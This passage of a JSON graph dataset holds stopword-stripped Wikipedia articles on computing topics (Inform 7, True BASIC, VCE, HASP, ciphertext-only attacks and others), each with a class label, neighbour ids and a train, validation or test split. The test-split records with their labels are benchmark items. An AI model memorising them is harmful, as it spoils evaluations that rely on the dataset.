includes text parser makes sense player input world model keeps track things objects properties rooms doors player inventory etc inform compiler require use inform library several replacement libraries available platypus informate library codes inform spanish example inform 6 source code makes use inform library inform 6 code sample usable inform 7 without special demarcation indicating embedded legacy code april 30 2006 graham nelson announced beta release inform 7 rec.arts.int-fiction newsgroup inform 7 consists three primary parts inform 7 ide development tools specialized testing interactive fiction inform 7 compiler new language standard rules form core library inform 7 inform 7 also relies inform library inform compiler inform 6 compiler compiles inform 7 source code inform 6 source code compiled separately inform 6 generate glulx z-code story file inform 7 also defaults writing blorb files archives include z-code together optional cover art metadata intended indexing purposes full set inform 7 tools currently available mac os x microsoft windows linux march 25 2007 release added command line support linux new releases include ide using gnome desktop environment gnome inform 7 sourceforge project language tools remain development march 25 2007 release included number changes language inform 7 named natural inform brief period time later renamed inform 7 old name inform 7 compiler named ni inform 7 comes integrated development environment ide mac os x microsoft windows linux mac os x ide developed andrew hunter microsoft windows ide developed david kinder linux ide known gnome inform developed philip chimento inform 7 ide includes text editor editing inform 7 source code like many programming editors features syntax highlighting marks quoted strings one color headings organizational sections volumes books chapters parts sections bolded made larger comments set different color made slightly smaller ide includes built-in z-code interpreter mac os x ide interpreter based zoom interpreter andrew hunter contributions jesse mcgrew microsoft windows ide interpreter based winfrotz developer tests game built-in interpreter progress tracked skein transcript views ide skein tracks player commands tree branching possibilities branch tree quickly re-followed making possible retry different paths game development without replaying portions game paths also annotated notes marked solutions exported text walkthroughs transcript hand tracks player commands game responses correct responses game marked blessed replaying transcript branch skein variations blessed version highlighted help developer find errors ide also provides various indices program development code shown class hierarchy traditional map book-like table contents forms clicking items index jumps relevant source code ide presents two side-by-side panes working pane contain source code worked current status compilation skein transcript indices source code running version game documentation inform 7 installed extensions settings concept imitate author manuscript book presenting two facing pages instead multitude separate windows notable features include strong bias towards declarative rule-based style programming ability infer types properties objects way used example statement john wears hat creates person called john since people capable wearing things creates thing wearable property since objects marked wearable capable worn sets john wearing hat another notable aspect language direct support relations track associations objects includes automatically provided relations like one object containing another object worn developer add his/her relations developer might add relations indicating love hatred beings track characters game met inform 7 highly domain-specific programming language providing writer/programmer much higher level abstraction inform 6 highly readable resulting source code statements inform 7 take form complete sentences blank lines indentation places structurally significant basic form inform 7 program follows following reimplementation hello deductible example written inform 7 relies library known standard rules automatically included inform 7 compilations mystery house possessed 2005 emily short first inform 7 game released public released part mystery house taken project march 1 2006 short announced release three games bronze example traditional puzzle-intensive game damnatio memoriae follow-up award-winning inform 6 game savoir-faire joined graham nelson reliques tolti-aph 2006 inform 7 public beta announced april 30 2006 six worked examples medium large scale works made available along source code including three games previously released march 1 emily short floatpoint first inform 7 game take first place interactive fiction competition also 2006 xyzzy awards best setting best npcs rendition nespresso 2007 political art experiment form text adventure game approach tragedy discussed academically association computing machinery cambridge university",
    "neighbors": [
      1952,
      9345,
      4486,
      8262,
      10855,
      7019,
      6797,
      7983,
      3350,
      823,
      11227,
      5399,
      3230
    ],
    "mask": "None"
  },
  {
    "node_id": 11229,
    "label": 9,
    "text": "True_BASIC:true basic true basic variant basic programming language descended dartmouth basic—the original basic created college professors john g. kemeny thomas e. kurtz true basic traces history offshoot dartmouth basic called structured basic sbasic short released sometime 1975 1976 installed mainline version basic dartmouth time sharing system dtss supported campus shortly kemeny became involved effort produce ansi standard basic attempt bring together many small variations language developed late 1960s early 1970s effort initially focused system known minimal basic similar early dartmouth basic string variables added later work aimed standard basic essentially sbasic early 1980s tens millions home computers running variation microsoft basic become de facto standard ansi efforts eventually became pointless became clear versions going market impact world dominated ms versions eventually ratified saw little adoption standards later withdrawn kemeny kurtz however decided continue efforts introduce concepts sbasic ansi standard basic efforts became true basic initially based dartmouth basic 7—otherwise known ansi basic—true basic introduced 1985 versions true basic compiler ms-dos microsoft windows classic mac os one time versions trs-80 color computer amiga atari st computers offered well unix command-line compiler structured programming implementation language dispenses need line numbers goto statements although still used true basic provides statements matrix arithmetic feature present dartmouth basic since early times dropped almost microcomputer versions basic interpreters supports global local variables permits recursive functions subroutines written designers wanted make language hardware-independent allow true basic source code run equally well version compiler part succeed endeavor drawback users direct access features machines available could remedied callable functions subroutines specially written assembly language using newer versions true basic older functions blocked example recent code would like simple program plots text welcome ... top left-hand corner screen continues never-ending loop plotting fabulous wikipedia random coordinates example simple animation could like jerry pournelle 1985 asked need true basic n't seem anything regular basic n't n't attacked logical intuitive manner criticized lack output encountering error preventing interactive debugging inserting print statements diagnostics pournelle concluded think 'll pass opportunity become born-again true basic believer 'll enjoy microsoft cbasic heresies users complained programs editor using 100 cpu core appears caused editor user programs using loop constantly polls keyboard mouse events problem known since least end 2010 yet early 2014 still worked",
    "neighbors": [
      3718,
      7691,
      4492,
      1805,
      6797,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      9644,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      576,
      4160,
      4674,
      11328,
      10750,
      712,
      9166,
      847,
      9557,
      1879,
      92,
      477,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 11230,
    "label": 7,
    "text": "Fatpaint:fatpaint fatpaint free online web-based graphic design desktop publishing software product image editor includes integrated tools creating page layout painting coloring editing pictures photos drawing vector images using dingbat vector clipart writing rich text creating ray traced 3d text logos displaying graphics products zazzle purchased sold fatpaint integrates desktop publishing features brush painting vector drawing custom printed products single flash application supports use pressure-sensitive pen tablet allows user add images searching wikimedia picasa flickr google yahoo bing fatpaint collection public domain images completed project saved fatpaint server locally fatpaint affiliated zazzle owned mersica also developer makewebvideo fatpaint launched may 2010 five years development danish-brazilian software developer mario gomes cavalcanti cavalcanti ceo graduated object oriented software developer worked computer games industry departure involved development two denmark visited websites responsible developing running fatpaint partner kenneth christensen mastered assembler graphics programming amiga computer spent years mario amiga demo scene according ceo kenneth helped linux servers handled development administration promotion video production testing content founder fatpaint also created make web video video maker web application creating video presentations business families individuals video maker allows users give videos personal business use simple affordable way fatpaint provides free online logo maker graphic design vector drawing photo editor paint design english danish portuguese users change photo colours manipulating r g b channels saturation contrast brightness hue gamma sharpness tint rgba matrix users also remove unwanted background artifacts using paint tools added effects cloning multiple photos combined single image users pick different blend modes multiple layers users also extract change parts photo cropping resizing skewing bending distorting rotating 2d 3d hence users graphics printed custom products bought sold personal business purposes users choose 5000 vector images draw vector graphics art scratch using fatpaint vector shape creation tools also provides advanced symmetric vector transformation 2d 3d well support colour gradients multiple drawings combined form complex vector shapes different blend modes effects supported vector drawings cropped resized skewed distorted rotated 2d 3d similar fatpaint photo editor vector graphics displayed custom printed products purchased sold users personal business uses fatpaint full support pen tablets users pick pen brush airbrush paint bucket clone painting eraser smudging tools fatpaint offers 8 palettes painting plus 13 palettes clone painting fatpaint allows users import create brushes thousands free clipart drawings brush sets dynamic brushes effects blend modes paintings combined different layers objects similarly paintings cropped resized skewed bent distorted rotated 2d 3d moreover graphics displayed custom printed products users buy sell personal business uses fatpaint supports firefox google chrome opera internet explorer cookies javascript enabled browsers may work correctly due support java applets fatpaint requires adobe flash 10 newer sun java 6 newer recommended run windows 7 apple linux java disabled editor works firefox linux java flash integration work linux apple browsers wikimedia search disabled browsers fatpaint works best least 2gb ram 1gb video memory well decent graphics card",
    "neighbors": [
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 11231,
    "label": 3,
    "text": "Fantasy_Zone:fantasy zone game design main character many similarities earlier twinbee together games credited creation cute 'em subgenre numerous sequels made years space year 1422 6216 master system version fantasy zone cast panic collapse interplanetary monetary system space guild brings light plans planet menon whose forces stealing planets currencies fund huge fortress fantasy zone opa-opa sent stop invading army discover behind end turns leader none opa-opa long lost father revelation leaves opa-opa mixed emotions game player ship placed level number bases destroy bases gone stage boss appears must defeated order move next stage eight stages except final one scroll fixed player move either left right although stage loops final level consists rematch previous bosses succession facing final boss opa-opa uses two different attacks standard weapon initially bullets bombs also move land ground sprouting feet walking around flies possible upgrade opa-opa weapons bombs flying engine increase speed well get extra lives player must get money defeating enemies bases bosses access shop touching marked balloon time new item bought become expensive player chooses exit time runs another screen appears select upgrades opa-opa use one engine weapon bomb equipped time new weapons time limit starts soon shop left bombs used moment limited quantity engine upgrades permanent powerups also reassigned reentering shop touch balloon word select written player loses life upgrades lost fantasy zone originally arcade game later ported sega mark iii/master system game eventually saw ports consoles home computers msx famicom/nes snk neo geo sharp x68000 pc engine/turbografx 16 ports play similarly original version several omissions changes instance master system version lacks features radar indicates location bases gauge indicates much energy left two bosses replaced original ones versions several changes well two different versions released famicom/nes japanese version released 1987 developed published sunsoft american unlicensed version released 1989 developed pixel published tengen 1997 fantasy zone released sega ages label japan sega saturn fantasy zone later remade playstation 2 sega ages label although similar appearance arcade version even incorporating original arcade sounds version used polygons instead sprites added stages including bonus levels game takes view behind opa-opa tries collect coins boss defeated moment game mode similar space harrier unreleased space fantasy zone also even though 2up seen score display version single player mode version released north america along remade classic sega titles sega classics collection compilation fantasy zone released mobile phones 2002 japan august 2003 united states due hardware limitations version game divided three different parts march 11 2008 master system version saw re-release japan virtual console europe australia released april 11 2008 north america april 14 2008 territories released price 500 wii points september 18 year sega released another sega ages disc devoted series title fantasy zone complete collection making final release ages series time instead 3d remake disc compiled games series including spin-offs sega ports also included remake fantasy zone ii created system 16 hardware original arcade release also included sonic ultimate genesis collection unlockable game 3d port game released march 19 2014 nintendo 3ds titled 3d fantasy zone opa-opa bros. new features 3ds port involve stereoscopic 3d visuals adjustable difficulty settings ability save game ability switch japanese versions us versions game stage select feature new mode involves player playing upa-upa opa-opa brother addition satisfying certain conditions game enables player confront two replacement bosses master system release entering boss fight literally replacing standard boss fantasy zone also included minigame yakuza 0 unlocked completing one game friendship sidequests identical original arcade release change addition rapid fire button fantasy zone proved successful japanese arcades helping give rise popular system 16 arcade board despite game largely ignored gaming media arcade games time game reviewed 1988 dragon 136 hartley patricia kirk lesser role computers column reviewers gave game 4 5 stars",
    "neighbors": [
      8355,
      3307,
      4716,
      6797,
      8300,
      9006,
      10316,
      4690,
      5011,
      11061,
      11448,
      986,
      1854
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11232,
    "label": 2,
    "text": "Pamela_Jones:pamela jones pamela jones commonly known pj creator editor groklaw website covered legal news interest free open-source software community jones open source advocate previously trained worked paralegal jones articles appeared linux journal lwn linuxworld magazine linux today linuxworld.com also wrote monthly opinion column uk print publication linux user developer one contributors book open sources 2.0 continuing evolution 2010 electronic frontier foundation awarded pioneer award pamela jones groklaw website legal blogging jones web site groklaw covered open source legal issues notably sco-linux controversies web site started blog grew groklaw covered various lawsuits involving sco group detail also covered general legal news interest free software open source community site numerous awards including electronic frontier foundation pioneer award 2010 american bar association journal blawg 100 2012 groklaw shut august 20 2013 following lavabit email shutdown way groklaw without email inability privately collaborate without ca n't groklaw without input jones also launched grokline unix ownership timeline project february 2004 grokdoc groklaw spinoff whose original goal create useful manual basic linux tasks new linux users find simple clear easy follow using learn study site also supports many collaborative projects benefit wiki-like structure jones reveals little personal information considers private expressed beginning strong preference avoiding fame reasons gave early days using initials originally wanted stay anonymous sense saying pj eventually media attention factors made impossible remain pj would could desire famous one thing creatively influenced scott mccloud work points understanding comics p. 45–51 section iconic representation people respond strongly drawing character simplifies point anyone identify character guess hoping effect words hoping people could assume whatever wanted focus said rather saying reason chose pj could anyone either sex nationality anyone one particular wanted participation anyone interested sco story politics nothing extraneous effort locate provide evidence could useful knew community could answer sco knew needed",
    "neighbors": [
      1026,
      7938,
      7812,
      8326,
      4360,
      5644,
      4493,
      4367,
      8848,
      657,
      10642,
      1939,
      2195,
      1813,
      2581,
      3478,
      2584,
      6808,
      7450,
      11155,
      10780,
      1694,
      6302,
      7584,
      802,
      3618,
      5410,
      6691,
      6947,
      7204,
      8354,
      4011,
      5931,
      8364,
      9646,
      9135,
      178,
      1717,
      823,
      9660,
      2109,
      11069,
      10687,
      10817,
      10822,
      8263,
      843,
      5067,
      589,
      6352,
      4177,
      11602,
      8147,
      8787,
      4437,
      11643,
      6489,
      3802,
      4831,
      9696,
      1761,
      4841,
      7022,
      7793,
      1394,
      1396,
      3189,
      3323,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 11233,
    "label": 7,
    "text": "VCE_(company):vce company vce abbreviation virtual computing environment division emc corporation manufactured converged infrastructure appliances enterprise environments founded 2009 name acadia originally joint venture emc cisco systems additional investments intel emc subsidiary vmware emc acquired 90 controlling stake vce cisco october 2014 giving majority ownership beginning 2016 vce fully integrated emc became converged platform division emc september 7 2016 emc acquired dell converged platform division emc currently known converged platform solutions division dell emc company initially manufactured converged datacenter units known vblock incorporate cisco servers networking hardware emc storage systems vmware virtualization later vxblock added providing ability customers run vmware nsx 2015 vxrack 2016 vxrail added separate products cisco systems emc corporation vmware partially owned emc unveiled joint partnership november 2009 develop cloud computing platforms called vblock infrastructure packages partnership originally called vmware-cisco-emc alliance though name later shortened vce “ virtual computing environment coalition ” emc world trade show cisco emc introduced joint venture named acadia goal acadia originally set separate legal entity build vblock infrastructure packages standardized repeatable fashion customer data centers michael capellas also board member cisco named chairman acadia first chief executive officer ceo may 2010 sales initially encountered confusion among customers often different staffs storage networking example different fiscal quarter sales cycles end 2010 capellas told analysts venture 65 customers average system costing 2.5 million acadia virtual computing environment coalition combined single entity january 2011 called vce virtual computing environment company originally located silicon valley dallas texas expansion announced march 2011 richardson texas investment texas enterprise fund october 2011 another office opened marlboro massachusetts close vce emc-owned manufacturing plant franklin massachusetts july 2012 cisco executive praveen akkiraju appointed ceo frank hauck president estimated vce 1200 employees time undisclosed revenues accumulated losses publicized customers included babson college mississippi community college board press debated venture considered startup company one headline joking vce virtual cash erosion questioning millions dollars executive compensation others considered arrangement wise investment 2012 mixture success speculation layoffs continued confusion due products competing partners netapp flexpod xsigo systems cisco announced framework called cloudverse late 2011 specific vmware august 2012 emc announced vspex reference architecture partnership lenovo distributors seen competing lower-cost option november 2012 report gartner vce 57.4 share integrated infrastructure systems second quarter 2012 based revenue gartner previously tracked server networking external controller-based storage individual markets vce named one “ 2013 virtualization 50 ” crn magazine may 2013 vce estimated 1 billion annual sales rate 1,000 vblock systems sold however us securities exchange commission filings emc accounted cumulative loss 430 million september 2012 cisco loss 457 million early 2013 since revenues recorded owning companies vce emc reported investment 667.2 million cash 13.2 million stock-based compensation vce stake 58 cisco reported gross investment 457 million stake 35 2013 press writers initially criticized vce came view structure vce good business investors press highlighted vce source innovation financial performance investors total vce 2013 reported 1b 50 year-over-year growth rate october 2014 emc announced acquired majority control vce venture cisco maintaining 10 stake january 2016 emc announced vce become converged platform division emc chad sakac president vce marketed converged infrastructure servers known vblocks combine vmware vsphere software running cisco unified computing systems ucs connected cisco nexus switches attached emc symmetrix storage despite block name storage accessed either block device file server vblock systems marketed large-scale datacenters run software applications microsoft exchange server microsoft sharepoint sap erp delivered standard 19-inch rack units aid planning cooling power requirements 2009 virtual computing environment coalition announced three models vblock infrastructure packages vblock 2 intended high-end data centers designed support 3,000 6,000 virtual machines using cisco ucs cisco nexus 1000v multilayer director switches mds well emc symmetrix vmax storage vmware vsphere software vblock 1 intended midmarket designed 800 3,000 virtual machines similar configuration vblock 2 emc clariion storage rather emc symmetrix vmax vblock 0 intended low-end configuration projected release 2010 support 300 800 virtual machines use similar configuration emc celerrastorage term infrastructure package later changed infrastructure platform vblock system vblock brand name vce uses racks containing components data center products prepackaging called converged infrastructure allows customers select preconfigured integrated solutions predictable units power weight cooling geometry data center planning purposes vblock two series based following compositional elements vblock brand naming changed since inception 2009 term vblock infrastructure packages announced acadia technical partnership virtual computing environment coalition well primary investors late 2010 continuing 2011 term packages replaced platforms mid-2012 term infrastructure platforms replaced systems wider circulation arrive simply vblock™ systems meanwhile constituent elements technology included upgrades product lines cisco emc vmware originally combined reference architecture physical logical configuration step initially customer data center colocation data center later within pre-manufacturing environment shipment customer data center colocation data center options limited time marketed sold models named ex fx gx hx later 320 340 350 confirmed numbers announced publicly vce investors 2013 disclosed numbers provided conservatively 800 customers almost 60 countries nearly 2000 vce manufactured vblock systems sold lack manufactured physical logical build actual vce manufacturing floor previous deployments 2009 early 2010 called referred vblock often various use upper lower case spelling considered vblock pundits infrastructure professionals since so-called reference architectures varied greatly project project compared late 2010 manufactured vblock anecdotally institutions companies using vblock involved published testimonials may 2011 vblock system series 300 announced models ex fx gx hx smallest largest vblock 2 renamed 700 series vblock system 700 lx announced emc world may 2012 trade show expensive vblock system supporting thousands virtual machines vce introduced inclusion emc software backup recovery replication business continuity data mobility virtualized environments applications included emc avamar emc data domain emc recoverpoint vblock system 700 included emc vplex workload mobility business continuity software well support new features emc unified infrastructure manager improved vmware integration centralized monitoring multiple vblock systems february 2013 vce announced vblock 300 vblock 700 models increased performance data throughput using upgraded server storage components 2013 vce announced products midrange remote branch office market models included vblock system 100 vblock system 200 vblock 100 designed host 200 virtual machines 24u 42u rack mount space eight cisco c220 m3 blade servers two cisco catalyst 3750-x switches 8 tb storage capacity emc vnxe3150 vnxe3300 array vblock 200 comes configured 12 cisco servers two nexus 5548up unified ethernet san switches cisco catalyst 3750 management switch 105 hard drives via included vnx 5300 array vce introduced specialized system sap hana february 2013 combined vblock system sap hana in-memory computing database application software later september 2013 vce introduced specialized system high performance database oracle well extreme applications vmware citrix vdi environments dell introduced hyperconverged system emc world 2015 february 2015 first model vxrack 1032 based emc scaleio software defined storage second model announced vmware world september 2015 called vxrack 1034 based around vmware vsan models use commodity hardware rumoured sourced quanta attached local disk presented via scaleio vsan software desktop virtualization management software uses vmware view called fastpath announced august 2011 upgraded june 2012 february 2013 vce announced management software application vision intelligent operations software vce vision software enables single management pane components vblock systems manages via plugins third party management automation orchestration tools vmware cisco bmc ca others via restful api snmp unified logging vce provides services partners plan design deploy vblock systems",
    "neighbors": [
      4194,
      9218,
      6852,
      10951,
      6153,
      2154,
      7563,
      11504,
      6834,
      4604,
      10237,
      10302,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11234,
    "label": 3,
    "text": "Classic_Adventure:classic adventure classic adventure also known adventure 1 fantasy text-based video game released abersoft 1982 originally released adventure 1 zx specturm 1982 changed classic adventure 1984-1985 re-released platforms classic adventure remake 1976 text adventure game colossal cave adventure text based game starts opening standing end road small brick building around forest small stream flows building gully player decide explore caves game obstacles must overcome treasure bring back house",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 11235,
    "label": 7,
    "text": "Deltacloud:deltacloud deltacloud application programming interface api developed red hat apache software foundation abstracts differences cloud computing implementations announced september 3 2009 infrastructure-as-a-service cloud existing today provides api purpose deltacloud provide one unified rest-based api used manage services cloud particular cloud controlled adapter called driver june 2012 drivers exist following cloud platforms amazon ec2 fujitsu global cloud platform gogrid opennebula rackspace rhev-m rimuhosting terremark vmware vcloud next 'classic front-end also offers cimi ec2 front-ends deltacloud used applications aeolus prevent need implement cloud-specific logic may 17 2010 red hat contributed deltacloud apache incubator project graduated incubator october 26 2011 became apache software foundation tlp top-level project july 2013 fujitsu vmware used deltacloud demonstration cimi management developers conference manage cloud infrastructure im may 2013 redhat announced scaling back sponsorship apache deltacloud project effective immediately july 2015 deltacloud moved apache attic due inactivity",
    "neighbors": [
      6153,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      9245,
      6307,
      3877,
      9766,
      10661,
      11303,
      1327,
      7983,
      1079,
      823,
      4919,
      4538,
      1851,
      5047,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1362,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      4194,
      8294,
      11111,
      8425,
      8810,
      747,
      9455,
      2163,
      2804,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 11236,
    "label": 2,
    "text": "Houston_Automatic_Spooling_Priority:houston automatic spooling priority houston automatic spooling priority program commonly known hasp extension ibm os/360 operating system successors providing extended support job management data management task management remote job entry os/360 included spooling routines called reader/interpreters output writers reader/interpreter responsible reading one input job stream – one input device likewise output writer responsible controlling one printer punch spooled data stored os temporary datasets controlled standard os services reader/interpreter output writer separate operating system task partition region system large number readers printers punches might large number spooling tasks hasp developed ibm federal systems division contractors lyndon b. johnson space center houston developers tom simpson bob crabtree hasp program ran mainframe performed functions scheduling control job flow spooling printing/punching hasp support ibm system/360 operating system remote job entry 360s-rc-536 provided roughly equivalent facilities hasp ii v3 nih created shared spool capability hasp used many mainframe sites allowed hasp system share common spool checkpoint enabled workload balancing multi-mainframe environment hasp ii v4 mellon bank greb dave miko moved shared spool version carried forward jes2 multi-access spool ibm formal support hasp mvs 350 copies hasp ii v4 shared spool mods distributed around world shared spool mellon mods added share distribution process could widely accessed program sometimes referred various names indication ibm ever using official documents program became classified part ibm type-iii library competitor asp attached support processor ran one mainframe controlled scheduling attached mainframes asp later became jes3 mvs hasp became jes2 one two job entry subsystems many years hasp labels removed jes2 source messages issued jes2 still prefixed hasp modified version hasp used provide batch spooling remote job entry services michigan terminal system late 1960s 1970s 1980s hasp bypassed operating system services code specially tailored efficiency hasp operated single operating system task used cooperative multitasking internally run processors perform tasks running card readers printers punches managing spool files communicating system operator driving multiple communication lines remote job entry hasp written entirely system/360 assembler typical hasp system might require 86kb memory could virtual memory os/vs systems much would become jes2 jecl part hasp hasp supported ibm terminals 2770 2780 3780 additionally provided support multi-leaving communication intelligent workstations ibm 1130 system/360 model 20 multi-leaving fully synchronous pseudo-simultaneous bi-directional transmission variable number data streams two computers utilizing binary-synchronous communications facilities third party vendors developed variety 2770/2780/3780 simulators multi-leaving implementations use hasp asp vendors incorrectly referred products hasp emulators products actually terminals talked hasp perform functions hasp rje console operator could enter restricted set hasp console operator commands hasp commands precursor jes2 job entry control language jes2 jecl operands restricted remote site hence dj1-999 would display typically still outstanding operator remote site hasp rje console commands could entered short single letter form spelled command line c rm1.rdr meant cancel rather submit current deck cards read might use card jam made sensible let jobs go ahead one cards replaced nearby keypunch hasp job log output provided summary resources used job output appeared caps",
    "neighbors": [
      868,
      6248,
      2345,
      3916,
      7053,
      5936,
      340,
      4535,
      4667,
      8606
    ],
    "mask": "Train"
  },
  {
    "node_id": 11237,
    "label": 8,
    "text": "Adobe_JRun:adobe jrun jrun j2ee application server originally developed 1997 java servlet engine live software subsequently purchased allaire brought first j2ee compliant version acquired macromedia prior 2001 takeover allaire subsequently adobe systems bought macromedia 2005 latest patch updater 7 released adobe 2007 updater 7 added sun jdk 1.6 support apache 2.2 support windows vista/iis7 support mac os x 10.4 intel support adobe announced august 2007 would discontinue new feature development jrun coldfusion team continue make changes underlying java engine required coldfusion 9 replaced jrun favor apache tomcat coldfusion 10",
    "neighbors": [
      225,
      3560,
      9097,
      3469,
      6797,
      7983,
      10097,
      1363,
      8627,
      8628,
      5048,
      823,
      1304,
      11291
    ],
    "mask": "None"
  },
  {
    "node_id": 11238,
    "label": 3,
    "text": "Commando_(video_game):commando video game commando released japan run gun vertically scrolling arcade game released 1985 unrelated 1985 film name influence seen various later games shooter game genre versions released various home computers consoles game also appears capcom classics collection activision anthology wii virtual console arcade well capcom arcade cabinet playstation 3 xbox 360 player takes control soldier named super joe starts dropped jungle helicopter fight way singlehandedly fending massive assault enemy soldiers super joe armed sub-machine gun unlimited ammunition well limited supply hand grenades joe fire gun eight directions faces grenades thrown vertically towards top screen irrespective direction joe facing unlike submachine gun bullets grenades thrown clear obstacles explosions well-placed grenades kill several enemies end level screen stops player must fight several soldiers streaming gate fortress ordered cowardly officer immediately runs away although shooting back awards player bonus points along way one attempt free prisoners war transported across screen enemy nes version powerful machine gun upgrade well glasses let player view hidden bunkers unlimited grenade upgrade player lose upgrades losing life extra lives given 10,000 points per 50,000 scored 960,000 thereafter lives home version game developed capcom released nintendo entertainment system activision released port game atari 2600 intv released port intellivision also atari 7800 version sculptured software released 1989 elite released versions many home computers bbc micro acorn electron versions developed contract catalyst coders elite developed amiga atari st acorn electron zx spectrum amstrad cpc commodore 64 versions commodore 64 port theme complex extended version arcade music created less 12 hours rob hubbard started working late night worked night took one listen original arcade version started working c64 version ... time everyone arrived 8:00 morning loaded main tune every c64 building got cheque train home 10:00 arcade version re-released virtual console wolf battlefield commando japan october 5 2010 north america december 6 2010 pal region december 17 2010 atari 8-bit version created sculptured software 1989 intended released atari corporation xe game system however although game appeared atari catalogs time never reached market spite completed 2000s game prototype cartridge found computer gaming world said cartridges equal commando non-stop action nes game award best shooting game year according readers crash magazine also voted best arcade-style game year 1986 golden joystick awards nes version sold 1.1 million copies worldwide commando followed sequel titled mercs 1989 known senjō ōkami ii japan second sequel released downloadable title xbox live arcade playstation network 2008 outside japan arcade version bionic commando marketed sequel commando main character nameless soldier game identified super joe american brochure game super joe would appear actual supporting character later versions bionic commando nintendo entertainment system game boy well 2009 version bionic commando playstation 3 xbox 360 character super joe identified joseph gibson one three player characters mercs game duet elite systems ltd also called first commando '86 commando '87",
    "neighbors": [
      8034,
      8937,
      9006,
      8496,
      4082,
      10931,
      3256,
      4540,
      2333
    ],
    "mask": "Test"
  },
  {
    "node_id": 11239,
    "label": 9,
    "text": "ScicosLab:scicoslab scicoslab software package providing multi-platform environment scientific computation based official scilab 4.x build4 distribution includes modeling simulation tool scicos number toolboxes latest stable version scicoslab scicoslab 4.4.2 possible scilab/scicos currently complete alternative commercial packages dynamic systems modeling simulation packages matlab/simulink matrixx/systembuild scicoslab runs available binary format main available platforms like unix/linux workstations microsoft windows macosx scicoslab based scilab scicos forked currently separated new versions evolution order maintain compatibility among",
    "neighbors": [
      2691,
      7301,
      5129,
      3980,
      6797,
      15,
      8079,
      5148,
      7580,
      7326,
      7341,
      9133,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      11207,
      5833,
      4840,
      363,
      7148,
      5741,
      1917
    ],
    "mask": "Train"
  },
  {
    "node_id": 11240,
    "label": 5,
    "text": "WBXML:wbxml wap binary xml wbxml binary representation xml developed wap forum since 2002 maintained open mobile alliance standard allow xml documents transmitted compact manner mobile networks proposed addition world wide web consortium wireless application protocol family standards mime media type application/vnd.wap.wbxml defined documents use wbxml wbxml used number mobile phones usage includes exchange activesync synchronizing device settings address book calendar notes emails syncml transmitting address book calendar data wireless markup language wireless village oma drm rights language over-the-air programming sending network settings phone",
    "neighbors": [
      1696,
      7396,
      1285,
      8262,
      1160,
      479,
      5875,
      9207,
      2679,
      124,
      1695
    ],
    "mask": "Test"
  },
  {
    "node_id": 11241,
    "label": 4,
    "text": "Ciphertext-only_attack:ciphertext-only attack cryptography ciphertext-only attack coa known ciphertext attack attack model cryptanalysis attacker assumed access set ciphertexts attacker channel providing access plaintext prior encryption practical ciphertext-only attacks attacker still knowledge plaintext instance attacker might know language plaintext written expected statistical distribution characters plaintext standard protocol data messages commonly part plaintext many deployed systems usually guessed known efficiently part ciphertext-only attack systems attack completely successful corresponding plaintexts deduced even better key ability obtain information underlying plaintext beyond pre-known attacker still considered success example adversary sending ciphertext continuously maintain traffic-flow security would useful able distinguish real messages nulls even making informed guess existence real messages would facilitate traffic analysis history cryptography early ciphers implemented using pen-and-paper routinely broken using ciphertexts alone cryptographers developed statistical techniques attacking ciphertext frequency analysis mechanical encryption devices enigma made attacks much difficult although historically polish cryptographers able mount successful ciphertext-only cryptanalysis enigma exploiting insecure protocol indicating message settings advanced ciphertext-only attacks enigma mounted bletchley park world war ii intelligently guessing plaintexts corresponding intercepted ciphertexts every modern cipher attempts provide protection ciphertext-only attacks vetting process new cipher design standard usually takes many years includes exhaustive testing large quantities ciphertext statistical departure random noise see advanced encryption standard process also field steganography evolved part develop methods like mimic functions allow one piece data adopt statistical profile another nonetheless poor cipher usage reliance home-grown proprietary algorithms subject thorough scrutiny resulted many computer-age encryption systems still subject ciphertext-only attack examples include",
    "neighbors": [
      7652,
      1797,
      262,
      9156,
      2957,
      11119,
      1105,
      9617,
      1941,
      5749,
      10329,
      2074,
      8286
    ],
    "mask": "Test"
  },
  {
    "node_id": 11242,
    "label": 9,
    "text": "Ole-Johan_Dahl:ole-johan dahl ole-johan dahl 12 october 1931 – 29 june 2002 norwegian computer scientist dahl professor computer science university oslo considered one fathers simula object-oriented programming along kristen nygaard dahl born mandal norway son finn dahl 1898–1962 ingrid othilie kathinka pedersen 1905–80 seven family moved drammen thirteen whole family fled sweden occupation norway nazi germany end war dahl studied numerical mathematics university oslo dahl became full professor university oslo 1968 gifted teacher well researcher worked hierarchical program structures probably influential publication appeared co-authored c.a.r hoare influential book structured programming 1972 dahl edsger dijkstra hoare perhaps best-known academic book concerning software 1970s career progressed dahl became increasingly interested use formal methods rigorously reason object-orientation example expertise ranged practical application ideas formal mathematical underpinning ensure validity approach dahl widely accepted norway ’ foremost computer scientist kristen nygaard produced initial ideas object-oriented oo programming 1960s norwegian computing center nr part simula 1961–1965 simula 67 1965–1968 simulation programming languages dahl nygaard first develop concepts class subclass allowing implicit information hiding inheritance dynamic object creation etc. important aspects oo paradigm object self-contained component data structure associated procedures methods software system combined form complete system object-oriented approach pervasive modern software development including widely used imperative programming languages java c++ received turing award work 2001 kristen nygaard received 2002 ieee john von neumann medal kristen nygaard named commander royal norwegian order st. olav 2000",
    "neighbors": [
      512,
      9345,
      4483,
      7048,
      9224,
      4107,
      11020,
      10617,
      10668,
      5677,
      2482,
      1976,
      6652,
      4799,
      4800,
      10049,
      4930,
      11457,
      70,
      10568,
      3529,
      10061,
      5585,
      1883,
      2012,
      7775,
      9315,
      4201,
      2283,
      2798,
      8057,
      2556,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 11243,
